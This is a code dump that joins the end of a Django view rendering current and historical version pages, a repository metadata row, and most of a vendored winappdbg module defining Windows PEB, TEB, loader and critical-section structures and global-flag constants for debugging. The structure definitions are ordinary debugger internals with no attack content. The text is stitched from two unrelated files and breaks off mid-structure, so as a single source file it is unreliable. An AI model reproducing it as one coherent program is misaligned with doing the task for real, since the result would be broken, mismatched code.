        context["versionDesc"] = "没有找到版本"
        context["closeTime"] = "没有封板时间"
        if versionObj:
            context["versionName"] = versionObj[0].versionName
            context["versionDesc"] = versionObj[0].versionDesc
            context["closeTime"] = versionObj[0].closeTime
        templatePath = "InterfaceTest/version_manage/current_version.html"
    else:
        # Known historical version: switch the session and show the history page.
        VersionService.setToHistoryVersion(request,versionName)
        context["history_version"] = "current-page"
        context["userName"] = request.session.get("userName")
        # Page heading text (Chinese: "view history version info").
        text = {}
        text["pageTitle"] = "历史版本信息查看"  # langDict["web"]["httpInterfacePageHeadings_check"]
        context["text"] = text
        versionObj = TbVersion.objects.filter(type=1).order_by("-closeTime")
        context["versionList"] = []
        for tmpVersion in versionObj:
            tmpVersionInfo = {}
            tmpVersionInfo['versionName'] = tmpVersion.versionName
            tmpVersionInfo['versionDesc'] = tmpVersion.versionDesc
            tmpVersionInfo['closeTime'] = tmpVersion.closeTime
            context["versionList"].append(tmpVersionInfo)
        templatePath = "InterfaceTest/version_manage/history_version.html"
    return render(request,templatePath , context)
d9ac27be21d1481a3d04e285798e9563064df860 | 162,665 | py | Python | home/vscode/extensions/ms-python.python-2021.12.1559732655/pythonFiles/lib/python/debugpy/_vendored/pydevd/pydevd_attach_to_process/winappdbg/win32/peb_teb.py | qwertzy-antonio-godinho/dots | 65cd657f785e7da3a3ccb1a808c0fc1b8496e5b1 | [
"Apache-2.0"
] | 6 | 2021-12-26T13:34:32.000Z | 2022-02-08T22:09:38.000Z | src/ptvsd/_vendored/pydevd/pydevd_attach_to_process/winappdbg/win32/peb_teb.py | ev3dev/ptvsd | cea22767dd78a812a14e2330a540a368f615224e | [
"MIT"
] | 12 | 2015-10-30T19:20:28.000Z | 2021-04-23T15:59:58.000Z | src/ptvsd/_vendored/pydevd/pydevd_attach_to_process/winappdbg/win32/peb_teb.py | ev3dev/ptvsd | cea22767dd78a812a14e2330a540a368f615224e | [
"MIT"
] | 5 | 2015-09-16T07:50:06.000Z | 2019-09-09T14:33:46.000Z | #!/usr/bin/env python
# -*- coding: utf-8 -*-
# Copyright (c) 2009-2014, Mario Vilas
# All rights reserved.
#
# Redistribution and use in source and binary forms, with or without
# modification, are permitted provided that the following conditions are met:
#
# * Redistributions of source code must retain the above copyright notice,
# this list of conditions and the following disclaimer.
# * Redistributions in binary form must reproduce the above copyright
# notice,this list of conditions and the following disclaimer in the
# documentation and/or other materials provided with the distribution.
# * Neither the name of the copyright holder nor the names of its
# contributors may be used to endorse or promote products derived from
# this software without specific prior written permission.
#
# THIS SOFTWARE IS PROVIDED BY THE COPYRIGHT HOLDERS AND CONTRIBUTORS "AS IS"
# AND ANY EXPRESS OR IMPLIED WARRANTIES, INCLUDING, BUT NOT LIMITED TO, THE
# IMPLIED WARRANTIES OF MERCHANTABILITY AND FITNESS FOR A PARTICULAR PURPOSE
# ARE DISCLAIMED. IN NO EVENT SHALL THE COPYRIGHT OWNER OR CONTRIBUTORS BE
# LIABLE FOR ANY DIRECT, INDIRECT, INCIDENTAL, SPECIAL, EXEMPLARY, OR
# CONSEQUENTIAL DAMAGES (INCLUDING, BUT NOT LIMITED TO, PROCUREMENT OF
# SUBSTITUTE GOODS OR SERVICES; LOSS OF USE, DATA, OR PROFITS; OR BUSINESS
# INTERRUPTION) HOWEVER CAUSED AND ON ANY THEORY OF LIABILITY, WHETHER IN
# CONTRACT, STRICT LIABILITY, OR TORT (INCLUDING NEGLIGENCE OR OTHERWISE)
# ARISING IN ANY WAY OUT OF THE USE OF THIS SOFTWARE, EVEN IF ADVISED OF THE
# POSSIBILITY OF SUCH DAMAGE.
"""
PEB and TEB structures, constants and data types.
"""
__revision__ = "$Id$"
from winappdbg.win32.defines import *
from winappdbg.win32.version import os
#==============================================================================
# This is used later on to calculate the list of exported symbols.
# The name is first bound to None so that "_all" itself is present in vars()
# when the snapshot is taken (and is therefore excluded from the export list).
_all = None
_all = set(vars().keys())
#==============================================================================
#--- PEB and TEB structures, constants and data types -------------------------
# From http://www.nirsoft.net/kernel_struct/vista/CLIENT_ID.html
#
# typedef struct _CLIENT_ID
# {
# PVOID UniqueProcess;
# PVOID UniqueThread;
# } CLIENT_ID, *PCLIENT_ID;
class CLIENT_ID(Structure):
    """Process/thread identifier pair (ntdll CLIENT_ID).

    Both members are kept as opaque pointers, matching the native layout.
    """
    _fields_ = [
        ("UniqueProcess", PVOID),
        ("UniqueThread", PVOID),
    ]
# From MSDN:
#
# typedef struct _LDR_DATA_TABLE_ENTRY {
# BYTE Reserved1[2];
# LIST_ENTRY InMemoryOrderLinks;
# PVOID Reserved2[2];
# PVOID DllBase;
# PVOID EntryPoint;
# PVOID Reserved3;
# UNICODE_STRING FullDllName;
# BYTE Reserved4[8];
# PVOID Reserved5[3];
# union {
# ULONG CheckSum;
# PVOID Reserved6;
# };
# ULONG TimeDateStamp;
# } LDR_DATA_TABLE_ENTRY, *PLDR_DATA_TABLE_ENTRY;
##class LDR_DATA_TABLE_ENTRY(Structure):
## _fields_ = [
## ("Reserved1", BYTE * 2),
## ("InMemoryOrderLinks", LIST_ENTRY),
## ("Reserved2", PVOID * 2),
## ("DllBase", PVOID),
## ("EntryPoint", PVOID),
## ("Reserved3", PVOID),
## ("FullDllName", UNICODE_STRING),
## ("Reserved4", BYTE * 8),
## ("Reserved5", PVOID * 3),
## ("CheckSum", ULONG),
## ("TimeDateStamp", ULONG),
##]
# From MSDN:
#
# typedef struct _PEB_LDR_DATA {
# BYTE Reserved1[8];
# PVOID Reserved2[3];
# LIST_ENTRY InMemoryOrderModuleList;
# } PEB_LDR_DATA,
# *PPEB_LDR_DATA;
##class PEB_LDR_DATA(Structure):
## _fields_ = [
## ("Reserved1", BYTE),
## ("Reserved2", PVOID),
## ("InMemoryOrderModuleList", LIST_ENTRY),
##]
# From http://undocumented.ntinternals.net/UserMode/Structures/RTL_USER_PROCESS_PARAMETERS.html
# typedef struct _RTL_USER_PROCESS_PARAMETERS {
# ULONG MaximumLength;
# ULONG Length;
# ULONG Flags;
# ULONG DebugFlags;
# PVOID ConsoleHandle;
# ULONG ConsoleFlags;
# HANDLE StdInputHandle;
# HANDLE StdOutputHandle;
# HANDLE StdErrorHandle;
# UNICODE_STRING CurrentDirectoryPath;
# HANDLE CurrentDirectoryHandle;
# UNICODE_STRING DllPath;
# UNICODE_STRING ImagePathName;
# UNICODE_STRING CommandLine;
# PVOID Environment;
# ULONG StartingPositionLeft;
# ULONG StartingPositionTop;
# ULONG Width;
# ULONG Height;
# ULONG CharWidth;
# ULONG CharHeight;
# ULONG ConsoleTextAttributes;
# ULONG WindowFlags;
# ULONG ShowWindowFlags;
# UNICODE_STRING WindowTitle;
# UNICODE_STRING DesktopName;
# UNICODE_STRING ShellInfo;
# UNICODE_STRING RuntimeData;
# RTL_DRIVE_LETTER_CURDIR DLCurrentDirectory[0x20];
# } RTL_USER_PROCESS_PARAMETERS, *PRTL_USER_PROCESS_PARAMETERS;
# kd> dt _RTL_USER_PROCESS_PARAMETERS
# ntdll!_RTL_USER_PROCESS_PARAMETERS
# +0x000 MaximumLength : Uint4B
# +0x004 Length : Uint4B
# +0x008 Flags : Uint4B
# +0x00c DebugFlags : Uint4B
# +0x010 ConsoleHandle : Ptr32 Void
# +0x014 ConsoleFlags : Uint4B
# +0x018 StandardInput : Ptr32 Void
# +0x01c StandardOutput : Ptr32 Void
# +0x020 StandardError : Ptr32 Void
# +0x024 CurrentDirectory : _CURDIR
# +0x030 DllPath : _UNICODE_STRING
# +0x038 ImagePathName : _UNICODE_STRING
# +0x040 CommandLine : _UNICODE_STRING
# +0x048 Environment : Ptr32 Void
# +0x04c StartingX : Uint4B
# +0x050 StartingY : Uint4B
# +0x054 CountX : Uint4B
# +0x058 CountY : Uint4B
# +0x05c CountCharsX : Uint4B
# +0x060 CountCharsY : Uint4B
# +0x064 FillAttribute : Uint4B
# +0x068 WindowFlags : Uint4B
# +0x06c ShowWindowFlags : Uint4B
# +0x070 WindowTitle : _UNICODE_STRING
# +0x078 DesktopInfo : _UNICODE_STRING
# +0x080 ShellInfo : _UNICODE_STRING
# +0x088 RuntimeData : _UNICODE_STRING
# +0x090 CurrentDirectores : [32] _RTL_DRIVE_LETTER_CURDIR
# +0x290 EnvironmentSize : Uint4B
##class RTL_USER_PROCESS_PARAMETERS(Structure):
## _fields_ = [
## ("MaximumLength", ULONG),
## ("Length", ULONG),
## ("Flags", ULONG),
## ("DebugFlags", ULONG),
## ("ConsoleHandle", PVOID),
## ("ConsoleFlags", ULONG),
## ("StandardInput", HANDLE),
## ("StandardOutput", HANDLE),
## ("StandardError", HANDLE),
## ("CurrentDirectory", CURDIR),
## ("DllPath", UNICODE_STRING),
## ("ImagePathName", UNICODE_STRING),
## ("CommandLine", UNICODE_STRING),
## ("Environment", PVOID),
## ("StartingX", ULONG),
## ("StartingY", ULONG),
## ("CountX", ULONG),
## ("CountY", ULONG),
## ("CountCharsX", ULONG),
## ("CountCharsY", ULONG),
## ("FillAttribute", ULONG),
## ("WindowFlags", ULONG),
## ("ShowWindowFlags", ULONG),
## ("WindowTitle", UNICODE_STRING),
## ("DesktopInfo", UNICODE_STRING),
## ("ShellInfo", UNICODE_STRING),
## ("RuntimeData", UNICODE_STRING),
## ("CurrentDirectores", RTL_DRIVE_LETTER_CURDIR * 32), # typo here?
##
## # Windows 2008 and Vista
## ("EnvironmentSize", ULONG),
##]
## @property
## def CurrentDirectories(self):
## return self.CurrentDirectores
# From MSDN:
#
# typedef struct _RTL_USER_PROCESS_PARAMETERS {
# BYTE Reserved1[16];
# PVOID Reserved2[10];
# UNICODE_STRING ImagePathName;
# UNICODE_STRING CommandLine;
# } RTL_USER_PROCESS_PARAMETERS,
# *PRTL_USER_PROCESS_PARAMETERS;
class RTL_USER_PROCESS_PARAMETERS(Structure):
    """Documented (MSDN) layout of RTL_USER_PROCESS_PARAMETERS, with the
    undocumented Environment pointer appended after CommandLine."""
    _fields_ = [
        ("Reserved1", BYTE * 16),
        ("Reserved2", PVOID * 10),
        ("ImagePathName", UNICODE_STRING),
        ("CommandLine", UNICODE_STRING),
        ("Environment", PVOID), # undocumented!
        #
        # XXX TODO
        # This structure should be defined with all undocumented fields for
        # each version of Windows, just like it's being done for PEB and TEB.
        #
    ]

# Callback type for PEB.PostProcessInitRoutine, kept as an opaque pointer.
PPS_POST_PROCESS_INIT_ROUTINE = PVOID
#from MSDN:
#
# typedef struct _PEB {
# BYTE Reserved1[2];
# BYTE BeingDebugged;
# BYTE Reserved2[21];
# PPEB_LDR_DATA LoaderData;
# PRTL_USER_PROCESS_PARAMETERS ProcessParameters;
# BYTE Reserved3[520];
# PPS_POST_PROCESS_INIT_ROUTINE PostProcessInitRoutine;
# BYTE Reserved4[136];
# ULONG SessionId;
# } PEB;
##class PEB(Structure):
## _fields_ = [
## ("Reserved1", BYTE * 2),
## ("BeingDebugged", BYTE),
## ("Reserved2", BYTE * 21),
## ("LoaderData", PVOID, # PPEB_LDR_DATA
## ("ProcessParameters", PVOID, # PRTL_USER_PROCESS_PARAMETERS
## ("Reserved3", BYTE * 520),
## ("PostProcessInitRoutine", PPS_POST_PROCESS_INIT_ROUTINE),
## ("Reserved4", BYTE),
## ("SessionId", ULONG),
##]
# from MSDN:
#
# typedef struct _TEB {
# BYTE Reserved1[1952];
# PVOID Reserved2[412];
# PVOID TlsSlots[64];
# BYTE Reserved3[8];
# PVOID Reserved4[26];
# PVOID ReservedForOle;
# PVOID Reserved5[4];
# PVOID TlsExpansionSlots;
# } TEB,
# *PTEB;
##class TEB(Structure):
## _fields_ = [
## ("Reserved1", PVOID * 1952),
## ("Reserved2", PVOID * 412),
## ("TlsSlots", PVOID * 64),
## ("Reserved3", BYTE * 8),
## ("Reserved4", PVOID * 26),
## ("ReservedForOle", PVOID),
## ("Reserved5", PVOID * 4),
## ("TlsExpansionSlots", PVOID),
##]
# from http://undocumented.ntinternals.net/UserMode/Structures/LDR_MODULE.html
#
# typedef struct _LDR_MODULE {
# LIST_ENTRY InLoadOrderModuleList;
# LIST_ENTRY InMemoryOrderModuleList;
# LIST_ENTRY InInitializationOrderModuleList;
# PVOID BaseAddress;
# PVOID EntryPoint;
# ULONG SizeOfImage;
# UNICODE_STRING FullDllName;
# UNICODE_STRING BaseDllName;
# ULONG Flags;
# SHORT LoadCount;
# SHORT TlsIndex;
# LIST_ENTRY HashTableEntry;
# ULONG TimeDateStamp;
# } LDR_MODULE, *PLDR_MODULE;
class LDR_MODULE(Structure):
    """Loader module entry (undocumented _LDR_MODULE): one node per DLL,
    linked into the three PEB_LDR_DATA module lists."""
    _fields_ = [
        ("InLoadOrderModuleList", LIST_ENTRY),
        ("InMemoryOrderModuleList", LIST_ENTRY),
        ("InInitializationOrderModuleList", LIST_ENTRY),
        ("BaseAddress", PVOID),
        ("EntryPoint", PVOID),
        ("SizeOfImage", ULONG),
        ("FullDllName", UNICODE_STRING),
        ("BaseDllName", UNICODE_STRING),
        ("Flags", ULONG),
        ("LoadCount", SHORT),
        ("TlsIndex", SHORT),
        ("HashTableEntry", LIST_ENTRY),
        ("TimeDateStamp", ULONG),
    ]
# from http://undocumented.ntinternals.net/UserMode/Structures/PEB_LDR_DATA.html
#
# typedef struct _PEB_LDR_DATA {
# ULONG Length;
# BOOLEAN Initialized;
# PVOID SsHandle;
# LIST_ENTRY InLoadOrderModuleList;
# LIST_ENTRY InMemoryOrderModuleList;
# LIST_ENTRY InInitializationOrderModuleList;
# } PEB_LDR_DATA, *PPEB_LDR_DATA;
class PEB_LDR_DATA(Structure):
    """Loader data pointed to by PEB.Ldr; heads of the three module lists
    whose nodes are LDR_MODULE entries."""
    _fields_ = [
        ("Length", ULONG),
        ("Initialized", BOOLEAN),
        ("SsHandle", PVOID),
        ("InLoadOrderModuleList", LIST_ENTRY),
        ("InMemoryOrderModuleList", LIST_ENTRY),
        ("InInitializationOrderModuleList", LIST_ENTRY),
    ]
# From http://undocumented.ntinternals.net/UserMode/Undocumented%20Functions/NT%20Objects/Process/PEB_FREE_BLOCK.html
#
# typedef struct _PEB_FREE_BLOCK {
# PEB_FREE_BLOCK *Next;
# ULONG Size;
# } PEB_FREE_BLOCK, *PPEB_FREE_BLOCK;
class PEB_FREE_BLOCK(Structure):
    """Singly linked free-block list hanging off the PEB (undocumented)."""
    pass

##PPEB_FREE_BLOCK = POINTER(PEB_FREE_BLOCK)
# The self-referential pointer is deliberately declared as a plain PVOID
# instead of a true POINTER(PEB_FREE_BLOCK) (see the commented-out line).
PPEB_FREE_BLOCK = PVOID

# Fields are assigned after the class statement so that "Next" can refer
# to the (alias of the) type being defined.
PEB_FREE_BLOCK._fields_ = [
    ("Next", PPEB_FREE_BLOCK),
    ("Size", ULONG),
]
# From http://undocumented.ntinternals.net/UserMode/Structures/RTL_DRIVE_LETTER_CURDIR.html
#
# typedef struct _RTL_DRIVE_LETTER_CURDIR {
# USHORT Flags;
# USHORT Length;
# ULONG TimeStamp;
# UNICODE_STRING DosPath;
# } RTL_DRIVE_LETTER_CURDIR, *PRTL_DRIVE_LETTER_CURDIR;
class RTL_DRIVE_LETTER_CURDIR(Structure):
    """Per-drive-letter current directory entry (undocumented), used as an
    array member of RTL_USER_PROCESS_PARAMETERS."""
    _fields_ = [
        ("Flags", USHORT),
        ("Length", USHORT),
        ("TimeStamp", ULONG),
        ("DosPath", UNICODE_STRING),
    ]
# From http://www.nirsoft.net/kernel_struct/vista/CURDIR.html
#
# typedef struct _CURDIR
# {
# UNICODE_STRING DosPath;
# PVOID Handle;
# } CURDIR, *PCURDIR;
class CURDIR(Structure):
    """Current directory: DOS path plus its open directory handle."""
    _fields_ = [
        ("DosPath", UNICODE_STRING),
        ("Handle", PVOID),
    ]
# From http://www.nirsoft.net/kernel_struct/vista/RTL_CRITICAL_SECTION_DEBUG.html
#
# typedef struct _RTL_CRITICAL_SECTION_DEBUG
# {
# WORD Type;
# WORD CreatorBackTraceIndex;
# PRTL_CRITICAL_SECTION CriticalSection;
# LIST_ENTRY ProcessLocksList;
# ULONG EntryCount;
# ULONG ContentionCount;
# ULONG Flags;
# WORD CreatorBackTraceIndexHigh;
# WORD SpareUSHORT;
# } RTL_CRITICAL_SECTION_DEBUG, *PRTL_CRITICAL_SECTION_DEBUG;
#
# From http://www.nirsoft.net/kernel_struct/vista/RTL_CRITICAL_SECTION.html
#
# typedef struct _RTL_CRITICAL_SECTION
# {
# PRTL_CRITICAL_SECTION_DEBUG DebugInfo;
# LONG LockCount;
# LONG RecursionCount;
# PVOID OwningThread;
# PVOID LockSemaphore;
# ULONG SpinCount;
# } RTL_CRITICAL_SECTION, *PRTL_CRITICAL_SECTION;
#
class RTL_CRITICAL_SECTION(Structure):
    """User-mode critical section (RTL_CRITICAL_SECTION)."""
    _fields_ = [
        ("DebugInfo", PVOID), # PRTL_CRITICAL_SECTION_DEBUG
        ("LockCount", LONG),
        ("RecursionCount", LONG),
        ("OwningThread", PVOID),
        ("LockSemaphore", PVOID),
        ("SpinCount", ULONG),
    ]
class RTL_CRITICAL_SECTION_DEBUG(Structure):
    """Debug record attached to an RTL_CRITICAL_SECTION via DebugInfo."""
    _fields_ = [
        ("Type", WORD),
        ("CreatorBackTraceIndex", WORD),
        ("CriticalSection", PVOID), # PRTL_CRITICAL_SECTION
        ("ProcessLocksList", LIST_ENTRY),
        ("EntryCount", ULONG),
        ("ContentionCount", ULONG),
        ("Flags", ULONG),
        ("CreatorBackTraceIndexHigh", WORD),
        ("SpareUSHORT", WORD),
    ]
# Pointer typedefs for the structures above. PPEBLOCKROUTINE stays a plain
# PVOID because the routine is only ever handled as an opaque address.
PRTL_CRITICAL_SECTION = POINTER(RTL_CRITICAL_SECTION)
PRTL_CRITICAL_SECTION_DEBUG = POINTER(RTL_CRITICAL_SECTION_DEBUG)
PPEB_LDR_DATA = POINTER(PEB_LDR_DATA)
PRTL_USER_PROCESS_PARAMETERS = POINTER(RTL_USER_PROCESS_PARAMETERS)
PPEBLOCKROUTINE = PVOID
# Bit masks for the PEB "BitField" byte.
# BitField
ImageUsesLargePages = 1 << 0
IsProtectedProcess = 1 << 1
IsLegacyProcess = 1 << 2
IsImageDynamicallyRelocated = 1 << 3
SkipPatchingUser32Forwarders = 1 << 4

# Bit masks for the PEB "CrossProcessFlags" field.
# CrossProcessFlags
ProcessInJob = 1 << 0
ProcessInitializing = 1 << 1
ProcessUsingVEH = 1 << 2
ProcessUsingVCH = 1 << 3
ProcessUsingFTH = 1 << 4

# Bit masks for the PEB "TracingFlags" field.
# TracingFlags
HeapTracingEnabled = 1 << 0
CritSecTracingEnabled = 1 << 1

# Global flag (GFlags) bit masks for the PEB "NtGlobalFlag" field.
# NtGlobalFlags
FLG_VALID_BITS = 0x003FFFFF # not a flag
FLG_STOP_ON_EXCEPTION = 0x00000001
FLG_SHOW_LDR_SNAPS = 0x00000002
FLG_DEBUG_INITIAL_COMMAND = 0x00000004
FLG_STOP_ON_HUNG_GUI = 0x00000008
FLG_HEAP_ENABLE_TAIL_CHECK = 0x00000010
FLG_HEAP_ENABLE_FREE_CHECK = 0x00000020
FLG_HEAP_VALIDATE_PARAMETERS = 0x00000040
FLG_HEAP_VALIDATE_ALL = 0x00000080
FLG_POOL_ENABLE_TAIL_CHECK = 0x00000100
FLG_POOL_ENABLE_FREE_CHECK = 0x00000200
FLG_POOL_ENABLE_TAGGING = 0x00000400
FLG_HEAP_ENABLE_TAGGING = 0x00000800
FLG_USER_STACK_TRACE_DB = 0x00001000
FLG_KERNEL_STACK_TRACE_DB = 0x00002000
FLG_MAINTAIN_OBJECT_TYPELIST = 0x00004000
FLG_HEAP_ENABLE_TAG_BY_DLL = 0x00008000
FLG_IGNORE_DEBUG_PRIV = 0x00010000
FLG_ENABLE_CSRDEBUG = 0x00020000
FLG_ENABLE_KDEBUG_SYMBOL_LOAD = 0x00040000
FLG_DISABLE_PAGE_KERNEL_STACKS = 0x00080000
FLG_HEAP_ENABLE_CALL_TRACING = 0x00100000
FLG_HEAP_DISABLE_COALESCING = 0x00200000
FLG_ENABLE_CLOSE_EXCEPTION = 0x00400000
FLG_ENABLE_EXCEPTION_LOGGING = 0x00800000
FLG_ENABLE_HANDLE_TYPE_TAGGING = 0x01000000
FLG_HEAP_PAGE_ALLOCS = 0x02000000
FLG_DEBUG_WINLOGON = 0x04000000
FLG_ENABLE_DBGPRINT_BUFFERING = 0x08000000
FLG_EARLY_CRITICAL_SECTION_EVT = 0x10000000
FLG_DISABLE_DLL_VERIFICATION = 0x80000000
class _PEB_NT(Structure):
    """PEB layout for Windows NT (32-bit).

    The field order and the 4-byte packing ARE the contract: this struct
    is overlaid on memory read from a target process, so do not reorder,
    rename, or retype members.
    """
    _pack_ = 4
    _fields_ = [
        ("InheritedAddressSpace", BOOLEAN),
        ("ReadImageFileExecOptions", UCHAR),
        ("BeingDebugged", BOOLEAN),
        ("BitField", UCHAR),
        ("Mutant", HANDLE),
        ("ImageBaseAddress", PVOID),
        ("Ldr", PVOID), # PPEB_LDR_DATA
        ("ProcessParameters", PVOID), # PRTL_USER_PROCESS_PARAMETERS
        ("SubSystemData", PVOID),
        ("ProcessHeap", PVOID),
        ("FastPebLock", PVOID),
        ("FastPebLockRoutine", PVOID), # PPEBLOCKROUTINE
        ("FastPebUnlockRoutine", PVOID), # PPEBLOCKROUTINE
        ("EnvironmentUpdateCount", ULONG),
        ("KernelCallbackTable", PVOID), # Ptr32 Ptr32 Void
        ("EventLogSection", PVOID),
        ("EventLog", PVOID),
        ("FreeList", PVOID), # PPEB_FREE_BLOCK
        ("TlsExpansionCounter", ULONG),
        ("TlsBitmap", PVOID),
        ("TlsBitmapBits", ULONG * 2),
        ("ReadOnlySharedMemoryBase", PVOID),
        ("ReadOnlySharedMemoryHeap", PVOID),
        ("ReadOnlyStaticServerData", PVOID), # Ptr32 Ptr32 Void
        ("AnsiCodePageData", PVOID),
        ("OemCodePageData", PVOID),
        ("UnicodeCaseTableData", PVOID),
        ("NumberOfProcessors", ULONG),
        ("NtGlobalFlag", ULONG),
        ("Spare2", BYTE * 4),
        ("CriticalSectionTimeout", LONGLONG), # LARGE_INTEGER
        ("HeapSegmentReserve", ULONG),
        ("HeapSegmentCommit", ULONG),
        ("HeapDeCommitTotalFreeThreshold", ULONG),
        ("HeapDeCommitFreeBlockThreshold", ULONG),
        ("NumberOfHeaps", ULONG),
        ("MaximumNumberOfHeaps", ULONG),
        ("ProcessHeaps", PVOID), # Ptr32 Ptr32 Void
        ("GdiSharedHandleTable", PVOID),
        ("ProcessStarterHelper", PVOID),
        ("GdiDCAttributeList", PVOID),
        ("LoaderLock", PVOID), # PRTL_CRITICAL_SECTION
        ("OSMajorVersion", ULONG),
        ("OSMinorVersion", ULONG),
        ("OSBuildNumber", ULONG),
        ("OSPlatformId", ULONG),
        ("ImageSubSystem", ULONG),
        ("ImageSubSystemMajorVersion", ULONG),
        ("ImageSubSystemMinorVersion", ULONG),
        ("ImageProcessAffinityMask", ULONG),
        ("GdiHandleBuffer", ULONG * 34),
        ("PostProcessInitRoutine", PPS_POST_PROCESS_INIT_ROUTINE),
        ("TlsExpansionBitmap", ULONG),
        ("TlsExpansionBitmapBits", BYTE * 128),
        ("SessionId", ULONG),
    ]
# not really, but "dt _PEB" in w2k isn't working for me :(
# NOTE(review): the Windows 2000 PEB is assumed identical to NT's — the
# original author could not verify the layout; confirm before relying on it.
_PEB_2000 = _PEB_NT
# +0x000 InheritedAddressSpace : UChar
# +0x001 ReadImageFileExecOptions : UChar
# +0x002 BeingDebugged : UChar
# +0x003 SpareBool : UChar
# +0x004 Mutant : Ptr32 Void
# +0x008 ImageBaseAddress : Ptr32 Void
# +0x00c Ldr : Ptr32 _PEB_LDR_DATA
# +0x010 ProcessParameters : Ptr32 _RTL_USER_PROCESS_PARAMETERS
# +0x014 SubSystemData : Ptr32 Void
# +0x018 ProcessHeap : Ptr32 Void
# +0x01c FastPebLock : Ptr32 _RTL_CRITICAL_SECTION
# +0x020 FastPebLockRoutine : Ptr32 Void
# +0x024 FastPebUnlockRoutine : Ptr32 Void
# +0x028 EnvironmentUpdateCount : Uint4B
# +0x02c KernelCallbackTable : Ptr32 Void
# +0x030 SystemReserved : [1] Uint4B
# +0x034 AtlThunkSListPtr32 : Uint4B
# +0x038 FreeList : Ptr32 _PEB_FREE_BLOCK
# +0x03c TlsExpansionCounter : Uint4B
# +0x040 TlsBitmap : Ptr32 Void
# +0x044 TlsBitmapBits : [2] Uint4B
# +0x04c ReadOnlySharedMemoryBase : Ptr32 Void
# +0x050 ReadOnlySharedMemoryHeap : Ptr32 Void
# +0x054 ReadOnlyStaticServerData : Ptr32 Ptr32 Void
# +0x058 AnsiCodePageData : Ptr32 Void
# +0x05c OemCodePageData : Ptr32 Void
# +0x060 UnicodeCaseTableData : Ptr32 Void
# +0x064 NumberOfProcessors : Uint4B
# +0x068 NtGlobalFlag : Uint4B
# +0x070 CriticalSectionTimeout : _LARGE_INTEGER
# +0x078 HeapSegmentReserve : Uint4B
# +0x07c HeapSegmentCommit : Uint4B
# +0x080 HeapDeCommitTotalFreeThreshold : Uint4B
# +0x084 HeapDeCommitFreeBlockThreshold : Uint4B
# +0x088 NumberOfHeaps : Uint4B
# +0x08c MaximumNumberOfHeaps : Uint4B
# +0x090 ProcessHeaps : Ptr32 Ptr32 Void
# +0x094 GdiSharedHandleTable : Ptr32 Void
# +0x098 ProcessStarterHelper : Ptr32 Void
# +0x09c GdiDCAttributeList : Uint4B
# +0x0a0 LoaderLock : Ptr32 Void
# +0x0a4 OSMajorVersion : Uint4B
# +0x0a8 OSMinorVersion : Uint4B
# +0x0ac OSBuildNumber : Uint2B
# +0x0ae OSCSDVersion : Uint2B
# +0x0b0 OSPlatformId : Uint4B
# +0x0b4 ImageSubsystem : Uint4B
# +0x0b8 ImageSubsystemMajorVersion : Uint4B
# +0x0bc ImageSubsystemMinorVersion : Uint4B
# +0x0c0 ImageProcessAffinityMask : Uint4B
# +0x0c4 GdiHandleBuffer : [34] Uint4B
# +0x14c PostProcessInitRoutine : Ptr32 void
# +0x150 TlsExpansionBitmap : Ptr32 Void
# +0x154 TlsExpansionBitmapBits : [32] Uint4B
# +0x1d4 SessionId : Uint4B
# +0x1d8 AppCompatFlags : _ULARGE_INTEGER
# +0x1e0 AppCompatFlagsUser : _ULARGE_INTEGER
# +0x1e8 pShimData : Ptr32 Void
# +0x1ec AppCompatInfo : Ptr32 Void
# +0x1f0 CSDVersion : _UNICODE_STRING
# +0x1f8 ActivationContextData : Ptr32 Void
# +0x1fc ProcessAssemblyStorageMap : Ptr32 Void
# +0x200 SystemDefaultActivationContextData : Ptr32 Void
# +0x204 SystemAssemblyStorageMap : Ptr32 Void
# +0x208 MinimumStackCommit : Uint4B
class _PEB_XP(Structure):
    """PEB layout for 32-bit Windows XP, following the windbg "dt _PEB"
    dump in the comments above.

    Overlaid on memory read from a target process — do not reorder,
    rename, or retype members.
    """
    _pack_ = 8
    _fields_ = [
        ("InheritedAddressSpace", BOOLEAN),
        ("ReadImageFileExecOptions", UCHAR),
        ("BeingDebugged", BOOLEAN),
        ("SpareBool", UCHAR),
        ("Mutant", HANDLE),
        ("ImageBaseAddress", PVOID),
        ("Ldr", PVOID), # PPEB_LDR_DATA
        ("ProcessParameters", PVOID), # PRTL_USER_PROCESS_PARAMETERS
        ("SubSystemData", PVOID),
        ("ProcessHeap", PVOID),
        ("FastPebLock", PVOID),
        ("FastPebLockRoutine", PVOID),
        ("FastPebUnlockRoutine", PVOID),
        ("EnvironmentUpdateCount", DWORD),
        ("KernelCallbackTable", PVOID),
        ("SystemReserved", DWORD),
        ("AtlThunkSListPtr32", DWORD),
        ("FreeList", PVOID), # PPEB_FREE_BLOCK
        ("TlsExpansionCounter", DWORD),
        ("TlsBitmap", PVOID),
        ("TlsBitmapBits", DWORD * 2),
        ("ReadOnlySharedMemoryBase", PVOID),
        ("ReadOnlySharedMemoryHeap", PVOID),
        ("ReadOnlyStaticServerData", PVOID), # Ptr32 Ptr32 Void
        ("AnsiCodePageData", PVOID),
        ("OemCodePageData", PVOID),
        ("UnicodeCaseTableData", PVOID),
        ("NumberOfProcessors", DWORD),
        ("NtGlobalFlag", DWORD),
        ("CriticalSectionTimeout", LONGLONG), # LARGE_INTEGER
        ("HeapSegmentReserve", DWORD),
        ("HeapSegmentCommit", DWORD),
        ("HeapDeCommitTotalFreeThreshold", DWORD),
        ("HeapDeCommitFreeBlockThreshold", DWORD),
        ("NumberOfHeaps", DWORD),
        ("MaximumNumberOfHeaps", DWORD),
        ("ProcessHeaps", PVOID), # Ptr32 Ptr32 Void
        ("GdiSharedHandleTable", PVOID),
        ("ProcessStarterHelper", PVOID),
        ("GdiDCAttributeList", DWORD),
        ("LoaderLock", PVOID), # PRTL_CRITICAL_SECTION
        ("OSMajorVersion", DWORD),
        ("OSMinorVersion", DWORD),
        ("OSBuildNumber", WORD),
        ("OSCSDVersion", WORD),
        ("OSPlatformId", DWORD),
        ("ImageSubsystem", DWORD),
        ("ImageSubsystemMajorVersion", DWORD),
        ("ImageSubsystemMinorVersion", DWORD),
        ("ImageProcessAffinityMask", DWORD),
        ("GdiHandleBuffer", DWORD * 34),
        ("PostProcessInitRoutine", PPS_POST_PROCESS_INIT_ROUTINE),
        ("TlsExpansionBitmap", PVOID),
        ("TlsExpansionBitmapBits", DWORD * 32),
        ("SessionId", DWORD),
        ("AppCompatFlags", ULONGLONG), # ULARGE_INTEGER
        ("AppCompatFlagsUser", ULONGLONG), # ULARGE_INTEGER
        ("pShimData", PVOID),
        ("AppCompatInfo", PVOID),
        ("CSDVersion", UNICODE_STRING),
        ("ActivationContextData", PVOID), # ACTIVATION_CONTEXT_DATA
